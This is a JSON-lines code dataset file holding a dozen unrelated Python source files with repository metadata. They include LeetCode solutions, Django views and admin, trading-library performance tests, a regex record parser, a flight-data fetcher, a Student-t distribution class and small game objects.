+{"seq_id":"34138868113","text":"#\n# @lc app=leetcode id=236 lang=python3\n#\n# [236] Lowest Common Ancestor of a Binary Tree\n#\n# https://leetcode.com/problems/lowest-common-ancestor-of-a-binary-tree/description/\n#\n# algorithms\n# Medium (42.53%)\n# Likes: 3115\n# Dislikes: 164\n# Total Accepted: 412.6K\n# Total Submissions: 953.4K\n# Testcase Example: '[3,5,1,6,2,0,8,null,null,7,4]\\n5\\n1'\n#\n# Given a binary tree, find the lowest common ancestor (LCA) of two given nodes\n# in the tree.\n# \n# According to the definition of LCA on Wikipedia: “The lowest common ancestor\n# is defined between two nodes p and q as the lowest node in T that has both p\n# and q as descendants (where we allow a node to be a descendant of itself).”\n# \n# Given the following binary tree: root = [3,5,1,6,2,0,8,null,null,7,4]\n# \n# \n# \n# Example 1:\n# \n# \n# Input: root = [3,5,1,6,2,0,8,null,null,7,4], p = 5, q = 1\n# Output: 3\n# Explanation: The LCA of nodes 5 and 1 is 3.\n# \n# \n# Example 2:\n# \n# \n# Input: root = [3,5,1,6,2,0,8,null,null,7,4], p = 5, q = 4\n# Output: 5\n# Explanation: The LCA of nodes 5 and 4 is 5, since a node can be a descendant\n# of itself according to the LCA definition.\n# \n# \n# \n# \n# Note:\n# \n# \n# All of the nodes' values will be unique.\n# p and q are different and both values will exist in the binary tree.\n# \n# \n#\n\n# @lc code=start\n# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Solution:\n def lowestCommonAncestor(self, root: 'TreeNode', p: 'TreeNode', q: 'TreeNode') -> 'TreeNode':\n \"\"\"\n ✔ Your runtime beats 23.52 % of python3 submissions\n ✔ Your memory usage beats 5.55 % of python3 submissions (29.1 MB)\n \"\"\"\n self.preorder = 0\n found = set()\n post = []\n def dfs(node):\n if node:\n self.preorder += 1\n if node is p:\n found.add(node)\n if node is q:\n found.add(node)\n \n node.preorder = self.preorder\n dfs(node.left)\n dfs(node.right)\n node.postorder = len(post) + 1\n post.append(node)\n \n dfs(root)\n \n mn_preorder = [f.preorder for f in found]\n mx_postorder = [f.postorder for f in found]\n \n for node in post:\n if node.preorder <= min(mn_preorder) and node.postorder >= max(mx_postorder):\n return node\n\n def lowestCommonAncestor(self, root, p, q):\n \"\"\"\n @ stefan\n ✔ Your runtime beats 6.8 % of python3 submissions\n ✔ Your memory usage beats 5.55 % of python3 submissions (39.1 MB)\n \"\"\"\n if root in (None, p, q): return root\n l, r = (self.lowestCommonAncestor(subtree, p, q) for subtree in (root.left, root.right))\n return root if l and r else l or r\n\n\n def lowestCommonAncestor(self, root, p, q):\n \"\"\"\n official answer\n \"\"\"\n def recur(node):\n if not node: return False\n left = recur(node.left)\n right = recur(node.right)\n mid = node == p or node == q\n if mid + left + right >= 2:\n self.ans = node\n return mid or left or right\n self.ans = None\n recur(root)\n return self.ans\n\n# @lc code=end\n","repo_name":"nickyfoto/lc","sub_path":"python/tests/236_lowest_common_ancestor_of_a_binary_tree.py","file_name":"236_lowest_common_ancestor_of_a_binary_tree.py","file_ext":"py","file_size_in_byte":3411,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"11532204952","text":"from core.models import Role\nfrom .models import AccountUser, PermissionLog\nfrom .serializers import AccountUserSerializers, PermissionLogSerializers, UserSerializer\nfrom rest_framework import viewsets\nfrom django.contrib.auth.models import User\n\n\nclass AccountUserViewSet(viewsets.ModelViewSet):\n serializer_class = AccountUserSerializers\n queryset = AccountUser.objects.all()\n\n def perform_create(self, serializer):\n super().perform_create(serializer)\n\n fields = {\n 'properties': serializer.instance.properties.values_list('id', flat=True),\n }\n try:\n serializer.instance.log_role_change(\n source=PermissionLog.ACCOUNT_USER_CREATED,\n type_of_change=PermissionLog.ROLE_CHANGED,\n new_role=serializer.instance.role\n )\n\n serializer.instance.log_property_change(\n source=PermissionLog.ACCOUNT_USER_CREATED,\n type_of_change=PermissionLog.PROPERTY_CHANGED,\n new_props=list(fields.get('properties')),\n old_props=list()\n )\n except Exception as e:\n # logger.exception(e)\n print(e)\n pass\n\n def perform_update(self, serializer):\n instance = self.get_object()\n\n previous_fields = {\n 'properties': list(instance.properties.values_list('id', flat=True)),\n 'role': getattr(instance.role, \"pk\", None),\n }\n\n super().perform_update(serializer)\n\n previous_property_ids = set(previous_fields['properties'])\n property_ids = set(list(serializer.instance.properties.values_list('id', flat=True)))\n\n fields = {\n 'properties': list(property_ids.symmetric_difference(previous_fields['properties'])),\n 'role': (serializer.instance.role.pk,) if serializer.instance.role.pk != previous_fields['role'] else []\n }\n # logging start here\n instance.log_role_change(\n source=PermissionLog.ACCOUNT_USER_UPDATED,\n type_of_change=PermissionLog.ROLE_CHANGED,\n old_role=instance.role,\n new_role=serializer.instance.role\n )\n\n added_properties = property_ids - previous_property_ids\n removed_properties = previous_property_ids - property_ids\n\n if added_properties or removed_properties:\n instance.log_property_change(\n source=PermissionLog.ACCOUNT_USER_UPDATED,\n type_of_change=PermissionLog.PROPERTY_CHANGED,\n new_props=added_properties,\n old_props=removed_properties\n )\n\n def perform_destroy(self, instance):\n fields = {\n 'properties': instance.properties.values_list('id', flat=True),\n 'role': getattr(instance.role, \"pk\", None)\n }\n instance.log_role_change(\n source=PermissionLog.ACCOUNT_USER_DELETED,\n type_of_change=PermissionLog.ROLE_CHANGED,\n old_role=instance.role,\n )\n instance.log_property_change(\n source=PermissionLog.ACCOUNT_USER_DELETED,\n type_of_change=PermissionLog.PROPERTY_CHANGED,\n old_props=list(fields.get('properties')),\n new_props=list()\n )\n super().perform_destroy(instance)\n\n\nclass PermissionLogView(viewsets.ModelViewSet):\n serializer_class = PermissionLogSerializers\n queryset = PermissionLog.objects.all()\n\n\nclass UserViewSet(viewsets.ModelViewSet):\n serializer_class = UserSerializer\n queryset = User.objects.all()\n","repo_name":"cloverananya/13094","sub_path":"manager/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3574,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"21701685393","text":"from nautilus_trader.core.correctness import PyCondition\nfrom nautilus_trader.test_kit.performance import PerformanceHarness\n\n\nclass TestCorrectnessConditionPerformance(PerformanceHarness):\n def test_condition_none(self):\n self.benchmark.pedantic(\n target=PyCondition.none,\n args=(None, \"param\"),\n iterations=100_000,\n rounds=1,\n )\n # ~0.0ms / ~0.1μs / 142ns minimum of 100,000 runs @ 1 iteration each run.\n\n def test_condition_true(self):\n self.benchmark.pedantic(\n target=PyCondition.true,\n args=(True, \"this should be true\"),\n iterations=100_000,\n rounds=1,\n )\n # ~0.0ms / ~0.1μs / 149ns minimum of 100,000 runs @ 1 iteration each run.\n\n # 100000 iterations @ 12ms with boolean except returning False\n # 100000 iterations @ 12ms with void except returning * !\n\n def test_condition_valid_string(self):\n self.benchmark.pedantic(\n target=PyCondition.valid_string,\n args=(\"abc123\", \"string_param\"),\n iterations=100_000,\n rounds=1,\n )\n # ~0.0ms / ~0.2μs / 205ns minimum of 100,000 runs @ 1 iteration each run.\n\n def test_condition_type_or_none(self):\n self.benchmark.pedantic(\n target=PyCondition.type_or_none,\n args=(\"hello\", str, \"world\"),\n iterations=100_000,\n rounds=1,\n )\n # ~0.0ms / ~0.2μs / 224ns minimum of 100,000 runs @ 1 iteration each run.\n","repo_name":"nautechsystems/nautilus_trader","sub_path":"tests/performance_tests/test_perf_correctness.py","file_name":"test_perf_correctness.py","file_ext":"py","file_size_in_byte":1540,"program_lang":"python","lang":"en","doc_type":"code","stars":1199,"dataset":"github-code","pt":"16"}
+{"seq_id":"5215328964","text":"#!/usr/bin/env python\n# encoding: utf-8\n\"\"\"\n@author: wushaohong\n@time: 2019-09-26 09:46\n\"\"\"\n\"\"\"给定一个非负整数数组,你最初位于数组的第一个位置。\n\n数组中的每个元素代表你在该位置可以跳跃的最大长度。\n\n你的目标是使用最少的跳跃次数到达数组的最后一个位置。\n\n示例:\n\n输入: [2,3,1,1,4]\n输出: 2\n解释: 跳到最后一个位置的最小跳跃数是 2。\n 从下标为 0 跳到下标为 1 的位置,跳 1 步,然后跳 3 步到达数组的最后一个位置。\n说明:\n\n假设你总是可以到达数组的最后一个位置。\n\n来源:力扣(LeetCode)\n链接:https://leetcode-cn.com/problems/jump-game-ii\n著作权归领扣网络所有。商业转载请联系官方授权,非商业转载请注明出处。\"\"\"\n\n\nclass Solution:\n def jump(self, nums) -> int:\n n = len(nums)\n dp = [float(\"inf\")] * n\n dp[0] = 0\n for i in range(1, len(nums)):\n for j in range(i):\n if nums[j] >= i - j:\n dp[i] = min(dp[i], dp[j] + 1)\n # print(dp)\n return dp[-1]\n\n def jump2(self, nums) -> int:\n # if len(nums) == 1:\n # return 0\n count = 0\n point = 0\n while point < len(nums) and nums[point] < len(nums) - point - 1:\n temp = 0\n p = point\n for i in range(1, nums[p] + 1):\n if nums[p + i]+p+i >= temp:\n temp = nums[p + i]+p+i\n point = p + i\n count += 1\n\n return count + 1\n\n\ndef jump(nums):\n end = 0\n maxPosition = 0\n steps = 0\n for i in range(len(nums) - 1):\n # 找能跳的最远的\n maxPosition = max(maxPosition, nums[i] + i)\n if i == end:\n # 遇到边界,就更新边界,并且步数加一\n end = maxPosition\n steps += 1\n return steps\n\n\nif __name__ == '__main__':\n sol = Solution()\n print(sol.jump([2, 3, 1, 1, 4]))\n print(sol.jump2([2, 3, 1, 1, 4]))\n print(jump([2, 3, 1, 1, 4]))\n","repo_name":"hshrimp/letecode_for_me","sub_path":"letecode/1-120/25-48/45.py","file_name":"45.py","file_ext":"py","file_size_in_byte":2077,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"}
+{"seq_id":"13819264471","text":"\"\"\"Regex, I think.\"\"\"\nimport re\n\n\nclass Entry:\n \"\"\"Entry class.\"\"\"\n\n def __init__(self, first_name: str, last_name: str, id_code: str, phone_number: str, date_of_birth: str,\n address: str):\n \"\"\"Init.\"\"\"\n self.first_name = first_name\n self.last_name = last_name\n self.id_code = id_code\n self.phone_number = phone_number\n self.date_of_birth = date_of_birth\n self.address = address\n\n def format_date(self):\n \"\"\"\n Return the date in the following format: 'Day: {day}, Month: {month}, Year: {year}'.\n\n Just for fun, no points gained or lost from this.\n\n Example: 'Day: 06, Month: 11, Year: 1995'\n If the object doesn't have date of birth given, return None.\n :return:\n \"\"\"\n date = self.date_of_birth\n if date is not None:\n date_list = date.split(\"-\")\n for i in range(len(date_list)):\n if i == 0:\n day = date_list[i]\n elif i == 1:\n month = date_list[i]\n elif i == 2:\n year = date_list[i]\n return f'Day: {day}, Month: {month}, Year: {year}'\n\n def __repr__(self) -> str:\n \"\"\"Object representation.\"\"\"\n return f\"Name: {self.first_name} {self.last_name}\\n\" \\\n f\"ID code: {self.id_code}\\n\" \\\n f\"Phone number: {self.phone_number}\\n\" \\\n f\"Date of birth: {self.format_date()}\\n\" \\\n f\"Address: {self.address}\"\n\n def __eq__(self, other) -> bool:\n \"\"\"\n Compare two entries.\n\n This method is perfect. Don't touch it.\n \"\"\"\n return self.first_name == other.first_name \\\n and self.last_name == other.last_name \\\n and self.id_code == other.id_code \\\n and self.phone_number == other.phone_number \\\n and self.date_of_birth == other.date_of_birth \\\n and self.address == other.address\n\n\ndef parse(row: str) -> Entry:\n \"\"\"\n Parse data from input string.\n\n :param row: String representation of the data.\n :return: Entry object with filled values\n \"\"\"\n regex = re.finditer(r\"(^[A-ZÕÜÖÄ]+[a-züõöä]+)?\"\n r\"([A-ZÕÜÖÄ]+[a-züõöä]+(?=\\d))?\"\n r\"([\\d]{11})\"\n r\"((?<=[\\d]{3})\\+[0-9]{3} ?[0-9]{7,8}|(?<=[\\d]{11})[0-9]{7,8})?\"\n r\"(\\d\\d-\\d\\d-\\d\\d\\d\\d)?\"\n r\"([\\w\\D\\d]+)?\", row)\n for match in regex:\n first_name = match.group(1)\n last_name = match.group(2)\n id_code = match.group(3)\n phone_number = match.group(4)\n date_of_birth = match.group(5)\n address = match.group(6)\n entry = Entry(first_name, last_name, id_code, phone_number, date_of_birth, address)\n return entry\n\n\nif __name__ == '__main__':\n print(parse('PriitPann39712047623+372 5688736402-12-1998Oja 18-2,Pärnumaa,Are'))\n \"\"\"\n Name: Priit Pann\n ID code: 39712047623\n Phone number: +372 56887364\n Date of birth: Day: 02, Month: 12, Year: 1998\n Address: Oja 18-2,Pärnumaa,Are\n \"\"\"\n print()\n print(parse('39712047623+372 5688736402-12-1998Oja 18-2,Pärnumaa,Are'))\n \"\"\"\n Name: None None\n ID code: 39712047623\n Phone number: +372 56887364\n Date of birth: Day: 02, Month: 12, Year: 1998\n Address: Oja 18-2,Pärnumaa,Are\n \"\"\"\n print()\n print(parse('PriitPann3971204762302-12-1998Oja 18-2,Pärnumaa,Are'))\n \"\"\"\n Name: Priit Pann\n ID code: 39712047623\n Phone number: None\n Date of birth: Day: 02, Month: 12, Year: 1998\n Address: Oja 18-2,Pärnumaa,Are\n \"\"\"\n print()\n print(parse('PriitPann39712047623+372 56887364Oja 18-2,Pärnumaa,Are'))\n \"\"\"\n Name: Priit Pann\n ID code: 39712047623\n Phone number: +372 56887364\n Date of birth: None\n Address: Oja 18-2,Pärnumaa,Are\n \"\"\"\n print()\n print(parse('PriitPann39712047623+372 5688736402-12-1998'))\n \"\"\"Name: Priit Pann\n ID 
code: 39712047623\n Phone number: +372 56887364\n Date of birth: Day: 02, Month: 12, Year: 1998\n Address: None\n \"\"\"\n","repo_name":"Krissuper11/Python","sub_path":"EX/ex06_regex/entry.py","file_name":"entry.py","file_ext":"py","file_size_in_byte":4160,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"37861849632","text":"#!/usr/bin/env python3\n# coding: UTF-8\n# Author: David\n# Email: youchen.du@gmail.com\n# Created: 2017-09-15 15:08\n# Last modified: 2017-10-07 17:16\n# Filename: create_fake_db.py\n# Description:\nimport sys\nimport os\nimport django\n\nbase_dir = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\nprint(base_dir)\nsys.path.append(base_dir)\nos.environ.setdefault(\"DJANGO_SETTINGS_MODULE\", \"SRPA.settings\")\ndjango.setup()\n\nfrom django.contrib.auth.models import User, Group\nfrom authentication import USER_IDENTITY_STUDENT, USER_IDENTITY_TEACHER\nfrom authentication import INSTITUTES\nfrom authentication.models import StudentInfo, TeacherInfo\nfrom const.models import Site, Workshop\nfrom SiteReservation.models import Reservation\nfrom ProjectApproval.models import Project, SocialInvitation\nfrom tools.utils import assign_perms\n\n\ndef create_student_info(num=10, prefix='student_'):\n students = []\n for i in range(1, 1 + num):\n user = User.objects.create_user(\n username=prefix + str(i),\n password=str(i),\n first_name=str(i))\n info = StudentInfo(\n user=user, identity=USER_IDENTITY_STUDENT,\n phone=str(i), student_id=str(i))\n info.save()\n assign_perms('studentinfo', user, info)\n assign_perms('reservation', user, perms='add',\n app_name='SiteReservation')\n assign_perms('project', user, perms='add',\n app_name='ProjectApproval')\n students.append(info)\n return students\n\n\ndef create_teacher_info(num=10, prefix='teacher_'):\n teachers = []\n for i in range(1, 1 + num):\n user = User.objects.create_user(\n username=prefix + str(i),\n password=str(i),\n first_name=str(i))\n info = TeacherInfo(\n user=user, identity=USER_IDENTITY_TEACHER)\n info.save()\n assign_perms('teacherinfo', user, info)\n teachers.append(info)\n return teachers\n\n\ndef create_site(num=10, prefix='site_'):\n for i in range(1, 1 + num):\n site = Site(desc=prefix + str(i))\n site.save()\n\n\ndef create_workshop(num=10, prefix='workshop_'):\n for i in range(1, 1 + num):\n desc = prefix + str(i)\n group, _ = Group.objects.get_or_create(name=desc)\n workshop = Workshop(desc=desc, group=group)\n workshop.save()\n\n\ndef main():\n create_student_info()\n teachers = create_teacher_info()\n create_site()\n create_workshop()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"Time1ess/SRPA","sub_path":"scripts/create_fake_db.py","file_name":"create_fake_db.py","file_ext":"py","file_size_in_byte":2506,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"28504431764","text":"import os\nimport sqlite3\nfrom sqlite3.dbapi2 import OperationalError\nimport requests\nimport datetime\n\nAPI_ROOT = 'https://opensky-network.org/api'\n\nos.chdir('D:/Works_Backups/Python/flytech/flytech')\n\nr = requests.get(url=API_ROOT + '/states/all')\ntime = r.json()['time']\nctime = datetime.datetime.fromtimestamp(time).strftime('%Y-%m-%d - %H:%M:%S')\n# states is a two dimensional list\nstates = r.json()['states']\nconn = sqlite3.connect('apadana.sqlite3')\ncur = conn.cursor()\ntry:\n data = cur.execute('SELECT id FROM dflight')\nexcept OperationalError:\n sql = \"\"\"CREATE TABLE dflight(\n id integer NOT NULL PRIMARY KEY AUTOINCREMENT,\n icao varchar(8),\n callsign varchar(10),\n country varchar(100),\n updated DATETIME\n );\"\"\"\n cur.execute(sql)\n print('dflight created')\nfor state in states:\n sql = \"\"\"INSERT INTO dflight (icao, callsign, country, updated)\n VALUES(?, ?, ?, ?);\"\"\"\n cur.execute(sql, (state[0], state[1], state[2], ctime))\nconn.commit()\nconn.close()\n","repo_name":"ebikdeli/flytech","sub_path":"assets/flight_data.0eba16b8e7c5.py","file_name":"flight_data.0eba16b8e7c5.py","file_ext":"py","file_size_in_byte":1074,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"39932033375","text":"class Solution:\n def merge(self, intervals):\n l = sorted(intervals, key = lambda x:(x[0], x[1]))\n res = []\n for i in range(len(l)):\n low, high = l[i][0], l[i][1]\n if res and low <= res[-1][1]:\n res[-1][1] = max(res[-1][1], high)\n else:\n res.append([low, high])\n return res","repo_name":"mihir254/LeetCode","sub_path":"Medium/56-Merge-Intervals.py","file_name":"56-Merge-Intervals.py","file_ext":"py","file_size_in_byte":366,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"30594513347","text":"from account import Bank\n\nclass ATM:\n\n def __init__(self, screen, card_reader, cash_dispenser,\n cheque_deposit_slot, cash_deposit_slot, printer):\n self.amount = 0\n self.screen = screen\n self.card_reader = card_reader\n self.cash_dispenser = cash_dispenser\n self.cash_deposit_slot = cash_deposit_slot\n self.cheque_deposit_slot = cheque_deposit_slot\n self.printer = printer\n self.account = None\n bank=Bank()\n bank.prepare_bank()\n\n def add_cash(self, amount):\n self.amount = amount\n\n def add_cash_customer(self, amount):\n self.amount += amount\n self.account.add_cash(amount)\n\n def debit_cash(self, amount):\n if self.account.amount < amount:\n raise Exception(\"you dont have enough cash\")\n\n if amount > self.amount:\n raise Exception(\"Not Enough Cash in atm\")\n self.amount -= amount\n self.account.amount -= amount\n\n def detail(self):\n msg = \"amount :\" + str(self.amount)\n self.screen.print_(msg)\n\n def enquiry(self):\n self.account.enquiry()\n\n def transfer(self, account_no, amount):\n bank = Bank()\n transfer_account = bank.get_account_by_no(account_no)\n self.account.check_amount_enough(amount)\n self.account.debit_cash(amount)\n transfer_account.add_cash(amount)\n","repo_name":"rnshaikh/SSD","sub_path":"ATM/atm.py","file_name":"atm.py","file_ext":"py","file_size_in_byte":1389,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"6290551652","text":"import sys\nsys.setrecursionlimit(10**5)\n\nN, M = map(int, sys.stdin.readline().split())\n\nboard = [list(map(int, sys.stdin.readline().split())) for _ in range(N)]\n\n\nisVisits = [[False for _ in range(M)] for _ in range(N)]\n\ndx = [-1, 0, 1, 0]\ndy = [0, -1, 0, 1]\n\ndef dfs(x, y):\n for k in range(4):\n nx = x + dx[k]\n ny = y + dy[k]\n if 0 <= nx < N and 0 <= ny < M and isVisits[nx][ny]:\n isVisits[nx][ny] = False\n if board[nx][ny]:\n dfs(nx, ny)\narea = 0\nwhile True:\n area += 1\n for x in range(N):\n for y in range(M):\n if board[x][y]:\n isVisits[x][y] = True\n for k in range(4):\n nx = x + dx[k]\n ny = y + dy[k]\n if 0 <= nx < N and 0 <= ny < M and not isVisits[nx][ny]:\n if not board[nx][ny]:\n board[x][y] -= 1\n if board[x][y] == 0:\n break\n print(*board, sep='\\n')\n check = 0\n for x in range(N):\n for y in range(M):\n if board[x][y] and isVisits[x][y]:\n dfs(x, y)\n check += 1\n elif not board[x][y] and isVisits[x][y]:\n isVisits[x][y] = False\n\n if check >= 2:\n print(area)\n break\n elif check == 0:\n print(0)\n break\n\n","repo_name":"saint6839/jungle-week-03","sub_path":"Week03/saint6839/2573.py","file_name":"2573.py","file_ext":"py","file_size_in_byte":1402,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"35078600685","text":"# Register your models here.\nfrom django.contrib import admin\nfrom .models import Body,TurorialCategory,TurorialSeries,Turorial\n\nclass ProductAdmin(admin.ModelAdmin):\n\tlist_display=['title','tutorial_slug','published']\t\n\tclass Meta:\n\t\tmodel= Turorial\n\nadmin.site.register(Body)\nadmin.site.register(TurorialSeries)\nadmin.site.register(TurorialCategory)\nadmin.site.register(Turorial,ProductAdmin)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n#class PlaceAdmin(admin.ModelAdmin):\n#\tsearch_fields=['name','description']\n#\tlist_editable=['price','active','featured']\n#\tclass Meta:\n#\t\tmodel= Places\n\n#class BodyAdmin(admin.ModelAdmin):\n#\tsearch_fields=['description']\n#\tlist_display=['description','featured','updated']\n#\tlist_editable=['description','featured']\n#\tclass Meta:\n#\t\tmodel= Body\n\n#class QuotepicsAdmin(admin.ModelAdmin):\n#\tsearch_fields=['description']\n#\tlist_display=['description','featured']\n#\tlist_editable=['description','featured']\n#\tclass Meta:\n#\t\tmodel= Quotepics\n\n\n\n\n#admin.site.register(Places,PlacesAdmin)\n#admin.site.register(DiscountField)\n\n\n\n#from . import models\n#from .models import Places,DiscountField,Body,Quotepics\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n#from .models import Product,ProductImage,HomePage\n\n#class ProductAdmin(admin.ModelAdmin):\n#\tsearch_fields=['title','description','slug']\n#\tlist_display=['title','price','active','updated']\n#\tlist_editable=['price','active']\n#\tclass Meta:\n#\t\tmodel= Product\n\n#admin.site.register(Product,ProductAdmin)\n\n#admin.site.register(ProductImage)\n\n#admin.site.register(HomePage)","repo_name":"shivamsjjha/django_product_management_app","sub_path":"products/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":1509,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"28506185644","text":"\"\"\"\nA multivariate Student-t PDF.\n\nAuthor:\n Panagiotis Tsilifis\n\nDate:\n 6/5/2014\n\n\"\"\"\n\n\n__all__ = ['MultivariateT']\n\n\nimport numpy as np\nimport math\nimport scipy.linalg\nfrom scipy import special\nfrom . import make_vector\nfrom . import call_many\nfrom . import PDFBase\n\n\nclass MultivariateT(PDFBase):\n\n \"\"\"\n A class representing the PDF of a multivariate Normal distribution.\n\n :param mu: The location of the distribution.\n :type mu: :class:`numpy.ndarray`\n :param C: The scale matrix. It is taken to be the unit matrix,\n if it is not specified.\n :type C: :class:`numpy.ndarray`\n\n :param nu: The degrees of freedom\n :type nu: Integer\n\n \"\"\"\n\n # The location\n _mu = None\n\n # The scale matrix\n _C = None\n\n # The degrees of freedom\n _nu = None\n\n # The Cholesky decomposition of C\n _L = None\n\n # The log of determinant of C\n _log_det_C = None\n\n # The inverse of C\n _inv_C = None\n\n @property\n def mu(self):\n \"\"\"\n :getter: The location of the distribution. Internally, it is represented\n as a row matrix.\n :setter: Set mu.\n \"\"\"\n return self._mu\n\n @mu.setter\n def mu(self, value):\n \"\"\"\n Set mu.\n \"\"\"\n value = make_vector(value)\n assert value.shape[0] == self.num_dim\n self._mu = value\n\n @property\n def C(self):\n \"\"\"\n :getter: The scale matrix.\n :setter: Set scale matrix.\n \"\"\"\n return self._C\n\n @C.setter\n def C(self, value):\n \"\"\"\n Set the covariance matrix\n \"\"\"\n assert value.ndim == 2\n assert value.shape[0] == self.num_dim and value.shape[1] == self.num_dim\n self._C = value\n # If the following fails, then we have a rank defficient covariance\n try:\n self._L = scipy.linalg.cho_factor(self.C, lower=True)\n self._inv_C = scipy.linalg.cho_solve(self.L, np.eye(self.num_dim))\n self._log_det_C = 2. * np.sum(np.log(np.diag(self.L[0])))\n except scipy.linalg.LinAlgError as e:\n # In this case, we need to find any matrix L such that C = L * L^T.\n # Only sampling will work. 
The log PDF, the gradient and the Hessian are\n # garbage in this case.\n self._inv_C = np.zeros((self.num_dim, self.num_dim))\n self._log_det_C = 0.\n lam, V = scipy.linalg.eigh(self.C)\n idx = lam > 1e-10\n lam = lam[idx]\n V = V[:, idx]\n L = np.dot(V, np.diag(np.sqrt(lam)))\n Cp = np.dot(L, L.T)\n self._L = (L, None)\n\n @property\n def L(self):\n \"\"\"\n :getter: The Cholesky decomposition of C.\n \"\"\"\n return self._L\n\n @property\n def log_det_C(self):\n \"\"\"\n :getter: The logarithm of the determinant of ``C``.\n \"\"\"\n return self._log_det_C\n\n @property\n def inv_C(self):\n \"\"\"\n :getter: The inverse of ``C``.\n \"\"\"\n return self._inv_C\n\n @property\n def nu(self):\n \"\"\"\n :getter: The degrees of freedom.\n :setter: Set nu.\n \"\"\"\n return self._nu\n\n @nu.setter\n def nu(self, value):\n \"\"\"\n Set nu.\n \"\"\"\n #assert isinstance(value, int)\n self._nu = value\n\n def __init__(self, mu, nu, C=None, name='Multivariate Student-t'):\n \"\"\"\n Initialize the object.\n \"\"\"\n self._mu = make_vector(mu)\n super(MultivariateT, self).__init__(self.mu.shape[0], name=name)\n if C is None:\n C = np.eye(self.num_dim)\n self.C = C\n self.nu = nu\n # const is the part of the likelihood that does not depend on any parameter\n self._const = -0.5 * self.num_dim * math.log(math.pi)\n\n def _eval(self, x):\n \"\"\"\n Evaluate the log of the PDF at x.\n \"\"\"\n t = scipy.linalg.solve_triangular(self.L[0], self.mu - x, lower=self.L[1])\n z1 = -np.log(special.gamma(self.nu / 2.))\n z2 = -0.5 * self.num_dim * np.log(self.nu)\n z3 = -0.5 * (self.nu + self.num_dim) * np.log(1. + np.dot(t.T, t) / self.nu)\n z4 = np.log(special.gamma((self.nu + self.num_dim) / 2.))\n return z1 + z2 + self._const - 0.5 * self.log_det_C + z3 + z4\n\n def _eval_grad(self, x):\n \"\"\"\n Evaluate the gradient of the log of the PDF at x.\n \"\"\"\n t = scipy.linalg.solve_triangular(self.L[0], self.mu - x, lower=self.L[1])\n quadr = 1 + np.dot(t.T, t) / self.nu\n res = scipy.linalg.cho_solve(self.L, self.mu - x)[None, :]\n return (self.nu + self.num_dim) * res / (quadr * self.nu)\n\n def _eval_hessian(self, x):\n \"\"\"\n Evaluate the Hessian of the log of the PDF at x.\n \"\"\"\n t = scipy.linalg.solve_triangular(self.L[0], self.mu - x, lower=self.L[1])\n quadr = 1 + np.dot(t.T, t) / self.nu\n res = scipy.linalg.cho_solve(self.L, self.mu - x)\n return (self.nu + self.num_dim) * ( 2. * np.dot(res, np.transpose(res)) / quadr - self.inv_C ) / (quadr * self.nu)\n\n def _eval_grad_mu(self, x):\n \"\"\"\n Evaluate the gradient with respect to mu at x.\n \"\"\"\n return -self._eval_grad(x)\n\n def grad_mu(self, x):\n \"\"\"\n Evaluate the derivative with respect to mu at x.\n \"\"\"\n return call_many(x, self._eval_grad_mu)\n\n def __str__(self):\n \"\"\"\n Return a string representation of the object.\n \"\"\"\n s = super(MultivariateT, self).__str__() + '\\n'\n s += 'mu:\\n'\n s += str(self.mu) + '\\n'\n s += 'C:\\n'\n s += str(self.C) + '\\n'\n s += 'nu:\\n'\n s += str(self.nu)\n return s\n","repo_name":"ebilionis/variational-reformulation-of-inverse-problems","sub_path":"vuq/_multivariate_t.py","file_name":"_multivariate_t.py","file_ext":"py","file_size_in_byte":5784,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"16"}
+{"seq_id":"5611439532","text":"import glm\nimport os\nimport sys\n\n# sys.path.append(os.path.dirname(__file__) + \"/../\")\nsys.path.append(sys.path[0] + \"/../\")\n\nfrom OpenGL.GL import *\nfrom OpenGL.GLUT import *\nfrom Source.System.gameObject import *\n\n\nclass GameObject(Sprite):\n\n def __init__(self):\n super().__init__()\n # texture obj\n self.Texture = \"\"\n self.Color = glm.vec3(1.0, 1.0, 1.0)\n # flags\n self.IsSolid = False\n self.Destroyed = False\n\n def Draw(self, system):\n system.SpriteRenderer.DrawNoTex(self.position, self.Size,\n self.Rotation, self.Color, self.Grid, self.Selected)\n\n\nclass BallObject(Sprite):\n\n def __init__(self):\n super().__init__()\n # ball attributes\n self.Radius = float(0)\n self.Stuck = True\n\n def BallMove(self, dt, window_width):\n if not self.Stuck:\n self.position = self.position + (self.Velocity * dt)\n\n if self.position.x <= 0.0:\n self.Velocity.x = -self.Velocity.x\n self.position.x = 0.0\n\n elif (self.position.x + self.Size.x) >= window_width:\n self.Velocity.x = -self.Velocity.x\n self.position.x = window_width - self.Size.x\n\n if self.position.y <= 0.0:\n self.Velocity.y = -self.Velocity.y\n self.position.y = 0.0\n\n return self.position\n\n def Reset(self, position, velocity):\n self.position = position\n self.Velocity = velocity\n self.Stuck = True\n\n\n","repo_name":"KingAiba/FYPEngine","sub_path":"Game/GameObjectV2.py","file_name":"GameObjectV2.py","file_ext":"py","file_size_in_byte":1553,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
